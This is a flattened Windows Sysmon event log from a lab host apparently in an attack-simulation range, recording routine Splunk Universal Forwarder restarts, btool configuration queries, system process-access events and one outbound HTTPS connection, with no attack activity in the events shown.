12:02:50.489{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000007999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000007997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.470{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-64EA-6064-C600-00000000AE01}70207028C:\Windows\system32\cmd.exe{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000007992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.482{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000007991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.470{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.476{266CAFBE-64EA-6064-C600-00000000AE01}7020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000007983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.439{266CAFBE-64E9-6064-C300-00000000AE01}50326800C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.190{266CAFBE-646C-6064-1500-00000000AE01}13161668C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000007981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.127{266CAFBE-64E9-6064-C200-00000000AE01}50806752C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.735{266CAFBE-64E9-6064-C300-00000000AE01}5032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 354300x80000000000000008036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.630{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53592-false52.250.195.204-443https 10341000x80000000000000008035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:51.078{266CAFBE-64EA-6064-CB00-00000000AE01}64166244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000008034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:51.031{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA3D569585E29E86DDDC5634A1464575,SHA256=C58B0BCE734E675CDC0CD43E840F24380BD52C5D21F06833B082899CDC22430C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:51.031{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8FE157E5DE67A56E7AAFD8D16565DC2A,SHA256=D845E5B73E32FAB6678A7809FB6487AC5CADEF4A3BD0E6913994F72CC42F6E01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.917{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EC-6064-CE00-00000000AE01}3104C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
